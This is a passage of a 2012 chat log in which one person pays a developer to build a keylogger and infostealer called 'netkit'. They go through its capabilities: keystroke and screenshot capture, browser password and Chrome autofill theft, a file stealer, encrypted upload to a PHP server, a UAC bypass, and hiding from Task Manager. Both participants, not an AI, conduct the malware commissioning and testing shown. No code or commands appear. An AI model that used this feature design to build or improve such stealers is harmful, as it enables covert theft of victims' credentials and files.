  1708. [12/16/2012 8:20:21 PM] Shelly Bongo: why nobody will be interested in your eyes? it's a keylogger, they sell a lot of them on HF
  1709. [12/16/2012 8:20:33 PM] Shelly Bongo: i do hope it's a good one too.
  1710. [12/16/2012 8:20:46 PM] ' Tweety HF;: Well it's only the keyboard hook which will sell i guess
  1711. [12/16/2012 8:20:49 PM] Shelly Bongo: otherwise, i might as well have paid $50 to meph to buy his
  1712. [12/16/2012 8:22:45 PM] ' Tweety HF;: It's pretty good, and works really fast. I tried out typing it but didn't succeed so far lol
  1713. [12/16/2012 8:25:10 PM] ' Tweety HF;: Just a minute, removing framework 4 and creating a new host
  1714. [12/16/2012 8:27:46 PM] ' Tweety HF;: what do you mean, "tried out typing it but didn't succeed" ?
  1715. [12/16/2012 8:28:04 PM] Shelly Bongo: what is this
  1716. [12/16/2012 8:28:09 PM] Shelly Bongo: i wrote that
  1717. [12/16/2012 8:28:17 PM] Shelly Bongo: weird bug
  1718. [12/16/2012 8:28:19 PM] Shelly Bongo: anyway
  1719. [12/16/2012 8:28:27 PM] Shelly Bongo: what do you mean that you tried it but didn't succeed?
  1720. [12/16/2012 8:28:34 PM] ' Tweety HF;: I tried to type as fast as i can to see if any keys are lost
  1721. [12/16/2012 8:28:38 PM] ' Tweety HF;: but i failed, no keys were lost
  1722. [12/16/2012 8:28:40 PM] ' Tweety HF;: i couldnt out type it
  1723. [12/16/2012 8:28:52 PM] Shelly Bongo: hmm, i never knew it was a problem for keyloggers
  1724. [12/16/2012 8:29:06 PM] Shelly Bongo: you mean that some keyloggers can be "outtyped" ?
  1725. [12/16/2012 8:29:10 PM] ' Tweety HF;: yup
  1726. [12/16/2012 8:29:18 PM] ' Tweety HF;: i optimized it as much as i can
  1727. [12/16/2012 8:34:04 PM] Shelly Bongo: does it take sqlite db files from browsers?
  1728. [12/16/2012 8:34:05 PM] Shelly Bongo: or no?
  1729. [12/16/2012 8:34:22 PM] ' Tweety HF;: yes
  1730. [12/16/2012 8:34:31 PM] Shelly Bongo: great
  1731. [12/16/2012 8:34:50 PM] Shelly Bongo: and zip files + aes encrypt during transfer?
  1732. [12/16/2012 8:35:08 PM] ' Tweety HF;: Yes
  1733. [12/16/2012 9:03:45 PM] Shelly Bongo: ok
  1734. [12/16/2012 9:04:05 PM] Shelly Bongo: when can you do the TV session with the VM?
  1735. [12/16/2012 9:04:16 PM] Shelly Bongo: i'll want us to do a source code overview
  1736. [12/16/2012 9:04:23 PM] ' Tweety HF;: Sure.
  1737. [12/16/2012 9:04:24 PM] Shelly Bongo: and demo of the tool with diff timers
  1738. [12/16/2012 9:04:27 PM] ' Tweety HF;: Alright.
  1739. [12/16/2012 9:04:35 PM] ' Tweety HF;: Just give me 10 minutes.
  1740. [12/16/2012 9:04:36 PM] Shelly Bongo: can you do it tonight?
  1741. [12/16/2012 9:04:39 PM] ' Tweety HF;: Yes.
  1742. [12/16/2012 9:22:38 PM] Shelly Bongo: you kept it pro with no file dropping right?
  1743. [12/17/2012 12:02:44 AM] Shelly Bongo: ?
  1744. [12/17/2012 12:04:35 AM] Shelly Bongo: In the TV session i'd like to go over:
  1745.  
  1746. [source code review]
  1747.  
  1748. Different timers:
  1749. - keylogger
  1750. - screenshots
  1751. - sysinfo
  1752. - files
  1753. - passwords + sqlite stealers
  1754.  
  1755. Configuration of file stealer - paths and extensions
  1756.  
  1757. In-memory data storage (no files), encrypted transfer
  1758.  
  1759. Server-side PHP
  1760.  
  1761. [ demo ]
  1762. - Show a win7 VM with no .Net 4 installed (vanilla Win7, with .net 2)
  1763. - store some fake passwords into chrome (to see in the pass stealer log), and some address in the chrome autofill (for the sqlite stealer)
  1764. - execute netkit
  1765. - show process list, try to kill netkit process
  1766. - go to google and type some strings (to see them in the keylog)
  1767. - validate all different timers triggered twice to see everything works by inspecting delivered logs/screenshots/files/passwords
  1768. [12/17/2012 12:52:51 AM] ' Tweety HF;: Just had dinner, setting up the presentation now
  1769. [12/17/2012 1:16:55 AM] ' Tweety HF;: I'm not going to uninstall NET Framework 4.0
  1770. [12/17/2012 1:17:00 AM] ' Tweety HF;: It takes ages and it comes with the IDE
  1771. [12/17/2012 1:17:14 AM] ' Tweety HF;: The target Framework is 2.0 and so is all the reference which I will show
  1772. [12/17/2012 2:57:42 AM] ' Tweety HF;: I haven't heard from you for a while..
  1773. [12/17/2012 2:59:50 AM] ' Tweety HF;: I need to go soon...
  1774. [12/17/2012 3:00:06 AM] ' Tweety HF;: Come on, can you respond?
  1775. [12/17/2012 3:10:19 AM] ' Tweety HF;: Come on..
  1776. [12/17/2012 3:19:00 AM] ' Tweety HF;: Dude seriously..
  1777. [12/17/2012 3:23:55 AM] ' Tweety HF;: I need to go offline
  1778. [12/17/2012 3:24:01 AM] Shelly Bongo: hi
  1779. [12/17/2012 3:24:05 AM] ' Tweety HF;: Damn
  1780. [12/17/2012 3:24:06 AM] ' Tweety HF;: gah
  1781. [12/17/2012 3:24:09 AM] ' Tweety HF;: AHH
  1782. [12/17/2012 3:24:13 AM] Shelly Bongo: pardon?
  1783. [12/17/2012 3:24:13 AM] ' Tweety HF;: i need sleep
  1784. [12/17/2012 3:24:19 AM] Shelly Bongo: we can do this tomorrow
  1785. [12/17/2012 3:24:24 AM] ' Tweety HF;: No
  1786. [12/17/2012 3:24:25 AM] ' Tweety HF;: now is fine
  1787. [12/17/2012 3:24:35 AM] ' Tweety HF;: I held you up too long
  1788. [12/17/2012 3:24:41 AM] Shelly Bongo: i won't argue with that
  1789. [12/17/2012 3:24:53 AM] ' Tweety HF;: https://secure.join.me/457-368-651
  1790. [12/17/2012 3:24:59 AM] Shelly Bongo: is everything ready now?
  1791. [12/17/2012 3:25:20 AM] ' Tweety HF;: Yes
  1792. [12/17/2012 3:25:59 AM] ' Tweety HF;: So i'll run it and show you how it works
  1793. [12/17/2012 3:26:00 AM] Shelly Bongo: sec
  1794. [12/17/2012 3:26:04 AM] Shelly Bongo: wait a min
  1795. [12/17/2012 3:26:05 AM] ' Tweety HF;: ok
  1796. [12/17/2012 3:26:07 AM] Shelly Bongo: i need to resize screen
  1797. [12/17/2012 3:26:09 AM] Shelly Bongo: don't see well
  1798. [12/17/2012 3:26:57 AM] Shelly Bongo: In the TV session i'd like to go over:
  1799.  
  1800. [source code review]
  1801.  
  1802. Different timers:
  1803. - keylogger
  1804. - screenshots
  1805. - sysinfo
  1806. - files
  1807. - passwords + sqlite stealers
  1808.  
  1809. Configuration of file stealer - paths and extensions
  1810.  
  1811. In-memory data storage (no files), encrypted transfer
  1812.  
  1813. Server-side PHP
  1814.  
  1815. [ demo ]
  1816. - Show a win7 VM with no .Net 4 installed (vanilla Win7, with .net 2)
  1817. - store some fake passwords into chrome (to see in the pass stealer log), and some address in the chrome autofill (for the sqlite stealer)
  1818. - execute netkit
  1819. - show process list, try to kill netkit process
  1820. - go to google and type some strings (to see them in the keylog)
  1821. - validate all different timers triggered twice to see everything works by inspecting delivered logs/screenshots/files/passwords
  1822. [12/17/2012 3:26:59 AM] Shelly Bongo: okay
  1823. [12/17/2012 3:27:34 AM] Shelly Bongo: sec
  1824. [12/17/2012 3:27:44 AM] Shelly Bongo: you're dropping files?
  1825. [12/17/2012 3:27:46 AM] Shelly Bongo: updates.dll
  1826. [12/17/2012 3:27:52 AM] Shelly Bongo: zip files in \system\
  1827. [12/17/2012 3:27:54 AM] Shelly Bongo: etc
  1828. [12/17/2012 3:28:10 AM] ' Tweety HF;: Yeah
  1829. [12/17/2012 3:28:14 AM] ' Tweety HF;: We discussed that already
  1830. [12/17/2012 3:28:24 AM] ' Tweety HF;: either we write to EOF or we leave a dictionary
  1831. [12/17/2012 3:28:25 AM] Shelly Bongo: we discussed that all files would be in memory
  1832. [12/17/2012 3:28:34 AM] ' Tweety HF;: Don't you remember our discussion?
  1833. [12/17/2012 3:28:57 AM] Shelly Bongo: we said we'll write to EOF
  1834. [12/17/2012 3:29:13 AM] ' Tweety HF;: But remember what happened to writing in EOF on text files?
  1835. [12/17/2012 3:29:17 AM] ' Tweety HF;: It's visible.
  1836. [12/17/2012 3:29:26 AM] Shelly Bongo: okay, so what do you do instead?
  1837. [12/17/2012 3:29:29 AM] ' Tweety HF;: Don't worry, this all uses a UAC bypass
  1838. [12/17/2012 3:29:37 AM] ' Tweety HF;: it just drops the file and uploads it
  1839. [12/17/2012 3:29:45 AM] Shelly Bongo: lets get back to the source
  1840. [12/17/2012 3:29:49 AM] Shelly Bongo: can you please follow my lit?
  1841. [12/17/2012 3:29:50 AM] Shelly Bongo: list
  1842. [12/17/2012 3:29:54 AM] Shelly Bongo: show me all the timers first
  1843. [12/17/2012 3:30:17 AM] ' Tweety HF;: I put the screenshot + file transfers in one timer
  1844. [12/17/2012 3:30:23 AM] ' Tweety HF;: do you want me to separate it?
  1845. [12/17/2012 3:30:26 AM] Shelly Bongo: yes
  1846. [12/17/2012 3:30:29 AM] Shelly Bongo: i asked all to be separate
  1847. [12/17/2012 3:31:23 AM] ' Tweety HF;: Done
  1848. [12/17/2012 3:31:29 AM] Shelly Bongo: okay
  1849. [12/17/2012 3:31:32 AM] ' Tweety HF;: Want me to show it working?
  1850. [12/17/2012 3:31:37 AM] Shelly Bongo: no wait
  1851. [12/17/2012 3:31:41 AM] ' Tweety HF;: ok
  1852. [12/17/2012 3:31:46 AM] Shelly Bongo: about the file timer
  1853. [12/17/2012 3:31:54 AM] Shelly Bongo: from my feature description:
  1854. [12/17/2012 3:32:00 AM | Removed 3:32:07 AM] Shelly Bongo: This message has been removed.
  1855. [12/17/2012 3:32:18 AM] Shelly Bongo: it should also trigger when computer is idle
  1856. [12/17/2012 3:32:27 AM] Shelly Bongo: is it done?
  1857. [12/17/2012 3:32:48 AM] ' Tweety HF;: It checks the idle count
  1858. [12/17/2012 3:32:54 AM] ' Tweety HF;: I put it as if idle for 5 minutes
  1859. [12/17/2012 3:33:00 AM] ' Tweety HF;: if thats too much i can lower it
  1860. [12/17/2012 3:33:32 AM] Shelly Bongo: "- sends out files whenever the computer is idle, and regardless to that - whenever FILER_SENDOUT_INTERVAL is reached"
  1861. [12/17/2012 3:33:38 AM] Shelly Bongo: it should be unrealted
  1862. [12/17/2012 3:33:41 AM] Shelly Bongo: unrelated
  1863. [12/17/2012 3:33:46 AM] Shelly Bongo: 1) every X minutes
  1864. [12/17/2012 3:33:52 AM] Shelly Bongo: 2) every time computer is idle
  1865. [12/17/2012 3:33:59 AM] Shelly Bongo: two separate conditions trigger the transfer
  1866. [12/17/2012 3:34:02 AM] ' Tweety HF;: Yes
  1867. [12/17/2012 3:34:18 AM] Shelly Bongo: is this how it works now?
  1868. [12/17/2012 3:34:18 AM] ' Tweety HF;: i have the timer interval and the send.Count
  1869. [12/17/2012 3:34:49 AM] Shelly Bongo: sorry, i have to leave
  1870. [12/17/2012 3:34:54 AM] ' Tweety HF;: damn it
  1871. [12/17/2012 3:34:55 AM] Shelly Bongo: i'll be here tomorrow
  1872. [12/17/2012 3:34:59 AM] ' Tweety HF;: What time
  1873. [12/17/2012 3:35:02 AM] Shelly Bongo: we can finish then
  1874. [12/17/2012 3:35:03 AM] ' Tweety HF;: 4.30 PM GMT
  1875. [12/17/2012 3:35:03 AM] ' Tweety HF;: Alright
  1876. [12/17/2012 3:35:10 AM] ' Tweety HF;: cya
  1877. [12/17/2012 3:35:49 AM] Shelly Bongo: i will probably be here sooner
  1878. [12/17/2012 3:35:56 AM] ' Tweety HF;: Ok
  1879. [12/17/2012 6:18:11 PM] ' Tweety HF;: Hi
  1880. [12/17/2012 7:09:53 PM] ' Tweety HF;: ???
  1881. [12/17/2012 11:54:14 PM] ' Tweety HF;: Are you bailing..?
  1882. [12/18/2012 2:22:58 AM] Shelly Bongo: hi
  1883. [12/18/2012 2:22:59 AM] Shelly Bongo: no
  1884. [12/18/2012 2:23:04 AM] Shelly Bongo: i want it
  1885. [12/18/2012 2:23:06 AM] ' Tweety HF;: ok
  1886. [12/18/2012 2:23:09 AM] ' Tweety HF;: presentation?
  1887. [12/18/2012 2:23:09 AM] Shelly Bongo: i have some urgent thing going on
  1888. [12/18/2012 2:23:15 AM] ' Tweety HF;: alright
  1889. [12/18/2012 2:23:26 AM] Shelly Bongo: yesterday i also understood that some things are already missing
  1890. [12/18/2012 2:24:17 AM] Shelly Bongo: anyway i want to do the presentation, to go over the subject i wrote to you yesterday
  1891. [12/18/2012 2:24:56 AM] Shelly Bongo: so bear with me, i'll try to be available in 2-3 hours, or tomorrow
  1892. [12/18/2012 2:25:06 AM] ' Tweety HF;: its almost 1am
  1893. [12/18/2012 2:25:12 AM] ' Tweety HF;: i will be gone in an hour
  1894. [12/18/2012 2:25:24 AM] Shelly Bongo: then it'll have to happen tomorrow
  1895. [12/18/2012 2:25:43 AM] ' Tweety HF;: alright
  1896. [12/18/2012 2:25:48 AM] ' Tweety HF;: and how much is the final payment
  1897. [12/18/2012 2:26:11 AM] Shelly Bongo: 200 usd, totalling in 350.
  1898. [12/18/2012 2:26:23 AM] ' Tweety HF;: meh
  1899. [12/18/2012 2:26:40 AM] Shelly Bongo: if you're not interested, i'll find someone else who is.
  1900. [12/18/2012 2:26:52 AM] Shelly Bongo: i would LOVE to pay the full 500
  1901. [12/18/2012 2:27:17 AM] Shelly Bongo: but you have caused me many problems with the delays (now i'm paying for this myself, before it was related to a project)
  1902. [12/18/2012 2:27:46 AM] ' Tweety HF;: It's been 2 days delay and another 2 days you were not online when i was
  1903. [12/18/2012 2:28:05 AM] Shelly Bongo: it was 2 days too long for the project, another contractor was hired, i lost a job
  1904. [12/18/2012 2:28:11 AM] Shelly Bongo: very simple
  1905. [12/18/2012 2:28:21 AM] Shelly Bongo: also some of the stealers are missing ("impossible to develop" blabla)
  1906. [12/18/2012 2:28:38 AM] Shelly Bongo: if you do a good job with the file stealer, i can bump it to 400 usd total
  1907. [12/18/2012 2:28:49 AM] Shelly Bongo: the file stealer is an important feature to me
  1908. [12/18/2012 2:29:01 AM] ' Tweety HF;: File stealer is working perfectly. I can demonstrate.
  1909. [12/18/2012 2:29:15 AM] Shelly Bongo: yes but is it up to the spec i sent you? did you read and check?
  1910. [12/18/2012 2:29:39 AM] ' Tweety HF;: Yes
  1911. [12/18/2012 2:29:39 AM] Shelly Bongo: yesterday i understood that the answer is 'no'
  1912. [12/18/2012 2:29:49 AM] ' Tweety HF;: It does everything required
  1913. [12/18/2012 2:30:05 AM] ' Tweety HF;: Yes
  1914. [12/18/2012 2:30:10 AM] Shelly Bongo: ok then, i'll see it tomorrow
  1915. [12/18/2012 2:30:14 AM] ' Tweety HF;: ok
  1916. [12/18/2012 2:30:16 AM] Shelly Bongo: i have another project now
  1917. [12/18/2012 2:30:21 AM] ' Tweety HF;: ok
  1918. [12/18/2012 7:08:13 PM] ' Tweety HF;: Are you online..
  1919. [12/18/2012 7:12:49 PM] Shelly Bongo: i was all day long when you weren't
  1920. [12/18/2012 7:12:59 PM] ' Tweety HF;: I have college..
  1921. [12/18/2012 7:13:00 PM] ' Tweety HF;: And work..
  1922. [12/18/2012 7:13:04 PM] Shelly Bongo: i'll be here as of 10PM your time
  1923. [12/18/2012 7:13:08 PM] ' Tweety HF;: ok
  1924. [12/18/2012 7:13:15 PM] Shelly Bongo: by "your time" i mean GMT
  1925. [12/18/2012 7:13:24 PM] ' Tweety HF;: alright
  1926. [12/19/2012 8:10:17 PM] Shelly Bongo: hi
  1927. [12/19/2012 8:10:35 PM] ' Tweety HF;: hi
  1928. [12/19/2012 8:11:03 PM] Shelly Bongo: can you do the TV demo now?
  1929. [12/19/2012 8:11:47 PM] ' Tweety HF;: https://secure.join.me/588-008-209
  1930. [12/19/2012 8:12:37 PM] Shelly Bongo: In the TV session i'd like to go over:
  1931.  
  1932. [source code review]
  1933.  
  1934. Different timers:
  1935. - keylogger
  1936. - screenshots
  1937. - sysinfo
  1938. - files
  1939. - passwords + sqlite stealers
  1940.  
  1941. Configuration of file stealer - paths and extensions
  1942.  
  1943. In-memory data storage (no files), encrypted transfer
  1944.  
  1945. Server-side PHP
  1946.  
  1947. [ demo ]
  1948. - Show a win7 VM with no .Net 4 installed (vanilla Win7, with .net 2)
  1949. - store some fake passwords into chrome (to see in the pass stealer log), and some address in the chrome autofill (for the sqlite stealer)
  1950. - execute netkit
  1951. - show process list, try to kill netkit process
  1952. - go to google and type some strings (to see them in the keylog)
  1953. - validate all different timers triggered twice to see everything works by inspecting delivered logs/screenshots/files/passwords
  1954. [12/19/2012 8:14:31 PM] ' Tweety HF;: watching?
  1955. [12/19/2012 8:14:38 PM] Shelly Bongo: yes
  1956. [12/19/2012 8:15:17 PM] ' Tweety HF;: i'm turning off the idle command
  1957. [12/19/2012 8:15:20 PM] ' Tweety HF;: just for now
  1958. [12/19/2012 8:15:37 PM] Shelly Bongo: we said it needs to work whenever the computer is idle
  1959. [12/19/2012 8:15:47 PM] Shelly Bongo: OR at every interval that is set up
  1960. [12/19/2012 8:15:49 PM] ' Tweety HF;: i know
  1961. [12/19/2012 8:15:50 PM] Shelly Bongo: not both
  1962. [12/19/2012 8:16:01 PM] Shelly Bongo: meaning, every X minutes it starts
  1963. [12/19/2012 8:16:07 PM] ' Tweety HF;: Yeah i got it
  1964. [12/19/2012 8:16:08 PM] Shelly Bongo: and also - every time the computer is idle
  1965. [12/19/2012 8:16:16 PM] ' Tweety HF;: but i'm turning the idle thing off for now
  1966. [12/19/2012 8:16:19 PM] ' Tweety HF;: to demonstrate
  1967. [12/19/2012 8:16:23 PM] ' Tweety HF;: btw
  1968. [12/19/2012 8:16:27 PM] ' Tweety HF;: everything is in milliseconds
  1969. [12/19/2012 8:16:56 PM] ' Tweety HF;: oh, we need a few fake files
  1970. [12/19/2012 8:17:04 PM] ' Tweety HF;: because i don't have the file extensions in the given location
  1971. [12/19/2012 8:17:57 PM] ' Tweety HF;: we can't use the microsoft webrequest
  1972. [12/19/2012 8:18:02 PM] ' Tweety HF;: on the update page
  1973. [12/19/2012 8:18:03 PM] ' Tweety HF;: they blocked my ip lol
  1974. [12/19/2012 8:18:07 PM] ' Tweety HF;: but it works
  1975. [12/19/2012 8:18:20 PM] Shelly Bongo: why does it throw an exception?
  1976. [12/19/2012 8:18:24 PM] Shelly Bongo: it shouldn't - even if it doesn't work
  1977. [12/19/2012 8:18:30 PM] ' Tweety HF;: i know
  1978. [12/19/2012 8:18:36 PM] ' Tweety HF;: it's because it's in debugger mode.
  1979. [12/19/2012 8:19:46 PM] Shelly Bongo: what is that dll?
  1980. [12/19/2012 8:19:48 PM] Shelly Bongo: zip
  1981. [12/19/2012 8:20:09 PM] Shelly Bongo: netkit doesn't require it to be copied with it to a target in order to run, correct?
  1982. [12/19/2012 8:20:22 PM] ' Tweety HF;: nope
  1983. [12/19/2012 8:20:26 PM] ' Tweety HF;: it runs from resources
  1984. [12/19/2012 8:20:57 PM] Shelly Bongo: what's the interval?
  1985. [12/19/2012 8:20:59 PM] Shelly Bongo: for the files
  1986. [12/19/2012 8:21:07 PM] ' Tweety HF;: 300000
  1987. [12/19/2012 8:21:22 PM] Shelly Bongo: 5 mins?
  1988. [12/19/2012 8:21:39 PM] ' Tweety HF;: 600000
  1989. [12/19/2012 8:21:53 PM] Shelly Bongo: why didn't sysinfo send itself?
  1990. [12/19/2012 8:22:10 PM] ' Tweety HF;: sec
  1991. [12/19/2012 8:22:24 PM] Shelly Bongo: sysinfo() should send itself after it runs
  1992. [12/19/2012 8:22:30 PM] Shelly Bongo: and then wait for its interval
  1993. [12/19/2012 8:22:36 PM] ' Tweety HF;: i know
  1994. [12/19/2012 8:22:37 PM] ' Tweety HF;: hold on
  1995. [12/19/2012 8:23:54 PM] Shelly Bongo: why are you dropping files?
  1996. [12/19/2012 8:23:58 PM] Shelly Bongo: and not store a memory stream
  1997. [12/19/2012 8:24:19 PM] ' Tweety HF;: we had that discussion already
  1998. [12/19/2012 8:24:52 PM] Shelly Bongo: we said you'll store info about files that were sent either in eof, or in a file
  1999. [12/19/2012 8:25:14 PM] Shelly Bongo: but we said we WILL NOT STORE FILES/SCREENSHOTS/LOGS
  2000. [12/19/2012 8:25:16 PM] Shelly Bongo: in files
  2001. [12/19/2012 8:25:19 PM] ' Tweety HF;: yeah and that didn't work
  2002. [12/19/2012 8:25:19 PM] Shelly Bongo: so wtf is this
  2003. [12/19/2012 8:25:31 PM] ' Tweety HF;: you can't zip in memory
  2004. [12/19/2012 8:25:35 PM] Shelly Bongo: yes you can
  2005. [12/19/2012 8:25:35 PM] ' Tweety HF;: it's not possible
  2006. [12/19/2012 8:25:41 PM] Shelly Bongo: it's possible, perhaps you can't
  2007. [12/19/2012 8:25:41 PM] ' Tweety HF;: and this is a UAC bypassed zone
  2008. [12/19/2012 8:25:43 PM] Shelly Bongo: but it's possible
  2009. [12/19/2012 8:26:07 PM] Shelly Bongo: okay
  2010. [12/19/2012 8:26:09 PM] Shelly Bongo: show me the rest
  2011. [12/19/2012 8:26:20 PM] Shelly Bongo: show me the files from: - keylogger
  2012. - screenshots
  2013. - sysinfo
  2014. - files
  2015. - passwords + sqlite stealers
  2016. [12/19/2012 8:26:25 PM] ' Tweety HF;: i will sec
  2017. [12/19/2012 8:29:32 PM] Shelly Bongo: you didn't even bother testing this before? it seems like basic functionality isn't working
  2018. [12/19/2012 8:29:44 PM] Shelly Bongo: and now i need to watch you fix basic things
  2019. [12/19/2012 8:30:35 PM] Shelly Bongo: i'm disconnecting
  2020. [12/19/2012 8:30:37 PM] Shelly Bongo: this is absurd
  2021. [12/19/2012 8:30:49 PM] ' Tweety HF;: i did.
  2022. [12/19/2012 8:30:55 PM] Shelly Bongo: [Wednesday, December 19, 2012 8:12 PM] Shelly Bongo:
  2023.  
  2024. <<< [source code review]
  2025.  
  2026. Different timers:
  2027. - keylogger
  2028. - screenshots
  2029. - sysinfo
  2030. - files
  2031. - passwords + sqlite stealers
  2032.  
  2033. Configuration of file stealer - paths and extensions
  2034.  
  2035. In-memory data storage (no files), encrypted transfer
  2036.  
  2037. Server-side PHP
  2038.  
  2039. [ demo ]
  2040. - Show a win7 VM with no .Net 4 installed (vanilla Win7, with .net 2)
  2041. - store some fake passwords into chrome (to see in the pass stealer log), and some address in the chrome autofill (for the sqlite stealer)
  2042. - execute netkit
  2043. - show process list, try to kill netkit process
  2044. - go to google and type some strings (to see them in the keylog)
  2045. - validate all different timers triggered twice to see everything works by inspecting delivered logs/screenshots/files/passwords
  2046. [12/19/2012 8:31:01 PM] Shelly Bongo: ^^ TEST THAT IT WORKS
  2047. [12/19/2012 8:31:03 PM] Shelly Bongo: then talk to me
  2048. [12/19/2012 8:31:16 PM] ' Tweety HF;: it does work.
  2049. [12/19/2012 8:31:20 PM] ' Tweety HF;: i already tested it.
  2050. [12/19/2012 8:31:21 PM] Shelly Bongo: i can see it doesn't
  2051. [12/19/2012 8:31:29 PM] Shelly Bongo: then why am i watching you fix code?
  2052. [12/19/2012 8:31:35 PM] Shelly Bongo: because it doesn't work.
  2053. [12/19/2012 8:31:37 PM] ' Tweety HF;: the encryption was being weird.
  2054. [12/19/2012 8:31:43 PM] ' Tweety HF;: but, it's fixed now.
  2055. [12/19/2012 8:32:02 PM] Shelly Bongo: listen
  2056. [12/19/2012 8:32:12 PM] Shelly Bongo: show me everything AT THE FLOW SPECIFIED in the text i pasted
  2057. [12/19/2012 8:32:15 PM] Shelly Bongo: start from [demo]
  2058. [12/19/2012 8:32:22 PM] Shelly Bongo: can you do that?
  2059. [12/19/2012 8:32:29 PM] Shelly Bongo: then [source code review]
  2060. [12/19/2012 8:32:41 PM] ' Tweety HF;: alright 1 sec then
  2061. [12/19/2012 8:32:43 PM] Shelly Bongo: ok.
  2062. [12/19/2012 8:36:03 PM] ' Tweety HF;: fixed it
  2063. [12/19/2012 8:36:11 PM] ' Tweety HF;: the encryption wasn't picking up the array locations
  2064. [12/19/2012 8:36:51 PM] ' Tweety HF;: https://secure.join.me/588-008-209
  2065. [12/19/2012 8:38:52 PM] ' Tweety HF;: watching?
  2066. [12/19/2012 8:39:00 PM] Shelly Bongo: sec
  2067. [12/19/2012 8:39:30 PM] Shelly Bongo: watching
  2068. [12/19/2012 8:39:46 PM] Shelly Bongo: STOP
  2069. [12/19/2012 8:39:50 PM] Shelly Bongo: you are not following my request
  2070. [12/19/2012 8:39:51 PM] ' Tweety HF;: ?
  2071. [12/19/2012 8:39:59 PM] Shelly Bongo: [Wednesday, December 19, 2012 8:30 PM] Shelly Bongo:
  2072.  
  2073. <<< [ demo ]
  2074. - Show a win7 VM with no .Net 4 installed (vanilla Win7, with .net 2)
  2075. - store some fake passwords into chrome (to see in the pass stealer log), and some address in the chrome autofill (for the sqlite stealer)
  2076. - execute netkit
  2077. - show process list, try to kill netkit process
  2078. - go to google and type some strings (to see them in the keylog)
  2079. - validate all different timers triggered twice to see everything works by inspecting delivered logs/screenshots/files/passwords
  2080. [12/19/2012 8:40:03 PM] Shelly Bongo: ...
  2081. [12/19/2012 8:40:05 PM] Shelly Bongo: start from the top
  2082. [12/19/2012 8:40:07 PM] Shelly Bongo: read & show
  2083. [12/19/2012 8:40:08 PM] ' Tweety HF;: it doesn't need framework 4
  2084. [12/19/2012 8:40:11 PM] Shelly Bongo: show me.
  2085. [12/19/2012 8:40:12 PM] ' Tweety HF;: look?
  2086. [12/19/2012 8:40:48 PM] Shelly Bongo: ok
  2087. [12/19/2012 8:40:51 PM] Shelly Bongo: now store some passwords
  2088. [12/19/2012 8:40:53 PM] ' Tweety HF;: it targets 2.0
  2089. [12/19/2012 8:40:58 PM] Shelly Bongo: and autofill in chrome
  2090. [12/19/2012 8:42:07 PM] ' Tweety HF;: that's how it uploads
  2091. [12/19/2012 8:42:22 PM] ' Tweety HF;: system info
  2092. [12/19/2012 8:42:47 PM] ' Tweety HF;: screenshot, files, sys info
  2093. [12/19/2012 8:42:48 PM] ' Tweety HF;: keylogs
  2094. [12/19/2012 8:42:50 PM] ' Tweety HF;: etc
  2095. [12/19/2012 8:43:49 PM] ' Tweety HF;: key strokes here..
  2096. [12/19/2012 8:44:28 PM] Shelly Bongo: what's updates.dll
  2097. [12/19/2012 8:44:54 PM] ' Tweety HF;: it's to store the hash
  2098. [12/19/2012 8:45:07 PM] ' Tweety HF;: screenshot
  2099. [12/19/2012 8:45:18 PM] Shelly Bongo: show it again
  2100. [12/19/2012 8:45:30 PM] Shelly Bongo: ok
  2101. [12/19/2012 8:45:56 PM] Shelly Bongo: show me sysinfo + files
  2102. [12/19/2012 8:47:43 PM] Shelly Bongo: hello?
  2103. [12/19/2012 8:47:50 PM] ' Tweety HF;: yeah sec
  2104. [12/19/2012 8:47:56 PM] ' Tweety HF;: my computer's a bit queer
  2105. [12/19/2012 8:48:29 PM] ' Tweety HF;: this is sys logs
  2106. [12/19/2012 8:48:36 PM] Shelly Bongo: where are the passwords?
  2107. [12/19/2012 8:48:40 PM] Shelly Bongo: and sqlite files
  2108. [12/19/2012 8:48:53 PM] ' Tweety HF;: sec
  2109. [12/19/2012 8:49:52 PM] ' Tweety HF;: forgot to add it into the cycle
  2110. [12/19/2012 8:49:53 PM] ' Tweety HF;: sec lol
  2111. [12/19/2012 8:49:58 PM] Shelly Bongo: to add what?
  2112. [12/19/2012 8:50:03 PM] Shelly Bongo: passwords or sqlite?
  2113. [12/19/2012 8:50:15 PM] ' Tweety HF;: sqlite
  2114. [12/19/2012 8:50:17 PM] ' Tweety HF;: i wrote it in
  2115. [12/19/2012 8:50:21 PM] ' Tweety HF;: i forgot to add it into the list
  2116. [12/19/2012 8:52:28 PM] ' Tweety HF;: yeah it adds them in
  2117. [12/19/2012 8:52:34 PM] ' Tweety HF;: but my chrome's weird
  2118. [12/19/2012 8:53:42 PM] Shelly Bongo: so once again..
  2119. [12/19/2012 8:53:47 PM] Shelly Bongo: please stop wasting my time
  2120. [12/19/2012 8:53:49 PM] ' Tweety HF;: no lol
  2121. [12/19/2012 8:53:50 PM] ' Tweety HF;: it works
  2122. [12/19/2012 8:53:50 PM] Shelly Bongo: TEST EVERYTHING
  2123. [12/19/2012 8:53:53 PM] Shelly Bongo: and talk to me
  2124. [12/19/2012 8:53:55 PM] ' Tweety HF;: but its my chrome
  2125. [12/19/2012 8:53:57 PM] ' Tweety HF;: its all tested..
  2126. [12/19/2012 8:54:14 PM] Shelly Bongo: show me how it behaves
  2127. [12/19/2012 8:54:18 PM] Shelly Bongo: if you try to kill the process
  2128. [12/19/2012 8:54:23 PM] Shelly Bongo: you said it'll say it's not allowed
  2129. [12/19/2012 8:55:00 PM] ' Tweety HF;: i changed it
  2130. [12/19/2012 8:55:05 PM] ' Tweety HF;: so it doesn't show on the process list anymore
  2131. [12/19/2012 8:55:13 PM] Shelly Bongo: but it does, i saw netkit just now
  2132. [12/19/2012 8:55:15 PM] ' Tweety HF;: netkit.vhost.exe
  2133. [12/19/2012 8:55:19 PM] ' Tweety HF;: that's visual studio's
  2134. [12/19/2012 8:55:27 PM] ' Tweety HF;: the file name's just netkit.exe
  2135. [12/19/2012 8:55:39 PM] Shelly Bongo: ok, so now it doesn't show at all?
  2136. [12/19/2012 8:55:42 PM] ' Tweety HF;: the clr won't let me end
  2137. [12/19/2012 8:55:44 PM] ' Tweety HF;: nope
  2138. [12/19/2012 8:55:50 PM] Shelly Bongo: what if a non-admin user installs netkit?
  2139. [12/19/2012 8:55:50 PM] ' Tweety HF;: look
  2140. [12/19/2012 8:55:53 PM] ' Tweety HF;: oh
  2141. [12/19/2012 8:55:57 PM] ' Tweety HF;: then it will still not show up
  2142. [12/19/2012 8:56:03 PM] ' Tweety HF;: it's using a different method
  2143. [12/19/2012 8:56:17 PM] ' Tweety HF;: the process is running but it sends a message to the task manager and removes itself
